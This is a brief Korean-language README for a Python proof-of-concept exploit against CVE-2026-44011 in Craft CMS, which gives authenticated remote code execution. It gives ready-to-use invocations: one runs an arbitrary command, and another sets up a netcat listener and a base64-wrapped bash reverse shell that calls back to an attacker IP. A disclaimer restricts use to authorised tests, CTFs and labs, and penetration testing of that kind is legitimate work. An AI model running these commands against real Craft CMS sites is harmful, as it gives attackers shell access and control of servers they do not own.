
Craft CMS의 CVE-2026-44011에 대한 Python 개념 증명으로, 명령 실행 및 base64로 래핑된 리버스 셸 페이로드를 이용한 인증된 원격 코드 실행을 악용합니다.
CVE-2026-44011-craft-rce-poc 사용법
단일 명령: bash
python3 craft_rce.py -b http://target -u USER -p PASS -c 'id'
리버스 셸 (base64로 감싼 bash):
nc -lvnp 4444
python3 craft_rce.py -b http://target -u USER -p PASS --revshell 10.10.14.213 4444
대상이 콜백에 도달할 수 없는 경우, 명시적으로 지정하세요:
python3 craft_rce.py -b http://target -u USER -p PASS --revshell 10.13.37.200 4444 -H 10.13.37.200 --listen-port 35509
면책 조항
승인된 테스트, CTF 및 실습 환경에서만 사용하세요. 소유하지 않았거나 명시적 테스트 허가를 받지 않은 시스템에 사용하지 마세요.